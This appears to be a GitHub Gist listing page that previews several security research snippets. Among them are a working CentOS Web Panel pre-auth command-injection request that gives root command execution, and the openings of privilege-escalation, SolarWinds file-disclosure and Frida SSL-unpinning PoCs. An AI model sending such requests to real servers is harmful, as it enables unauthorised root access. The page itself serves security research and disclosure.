Skip to content

Instantly share code, notes, and snippets.

Avatar
🌑

numan türle numanturle

🌑
View GitHub Profile
@divinepwner
divinepwner / cwp.md
Created Aug 26, 2021
cwp pre-auth command inj BUT ULTRA RARE case.
View cwp.md

This is a very very rare case on CentOS Web Panel. Key value should be set on target CentOS Web Panel. When key value has been set on target, this can be bypassed with ".?" and without key value, commands can be executed on target system via root level privileges.

command injection on username parameter.

GET /admin/index.php?api=test&key=.?&action=xml&username=root;[command_here]%0A HTTP/1.1
Host: target:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
@tothi
tothi / usbgadget_razer.sh
Created Aug 22, 2021
Razer USB gadget on Android for Local Privilege Escalation on Windows
View usbgadget_razer.sh
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
View m1racles-poc.c
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
@0xsha
0xsha / Solarwinds_Orion_LFD.py
Last active Oct 21, 2021
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
View Solarwinds_Orion_LFD.py
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@antichown
antichown / Golang cross compilation
Last active Nov 7, 2020
Golang cross compilation
View Golang cross compilation
#!/bin/bash
# Reference:
# https://github.com/golang/go/blob/master/src/go/build/syslist.go
os_archs=(
aix/ppc64
darwin/386
darwin/amd64
dragonfly/amd64
freebsd/386
@IvanChepurnyi
IvanChepurnyi / JIT results
Last active Apr 29, 2021
Benchmark HTTP service
View JIT results
wrk -c 500 -d 30s -t 12 -R 20k -L http://localhost:8888
Running 30s test @ http://localhost:8888
12 threads and 500 connections
Thread calibration: mean lat.: 456.139ms, rate sampling interval: 3485ms
Thread calibration: mean lat.: 458.787ms, rate sampling interval: 3125ms
Thread calibration: mean lat.: 294.161ms, rate sampling interval: 1654ms
Thread calibration: mean lat.: 391.126ms, rate sampling interval: 3123ms
Thread calibration: mean lat.: 325.404ms, rate sampling interval: 2699ms
Thread calibration: mean lat.: 359.069ms, rate sampling interval: 2533ms
Thread calibration: mean lat.: 72.867ms, rate sampling interval: 222ms
@eybisi
eybisi / hooky.js
Created Apr 18, 2020
hookymooky.js
View hooky.js
// install package with adb install package.name
// do not open application
// use -f force option
// frida -U -f package.name -l del.js
Java.perform(function() {
var ssl = Java.use("k.x$b")
var channel = Java.use("f.e.c.b.g.f.g.a.c")
var Integer = Java.use("java.lang.Integer");
var ArrayList = Java.use("java.util.ArrayList");
var ArrayList = Java.use("java.util.ArrayList");
View gd-gif.php
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active May 24, 2021
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
View 20200114-TLP-WHITE_CVE-2020-0601.md

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@akabe1
akabe1 / frida_multiple_unpinning.js
Last active Oct 21, 2021
Another Android ssl certificate pinning bypass for various methods
View frida_multiple_unpinning.js
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function () {
console.log('');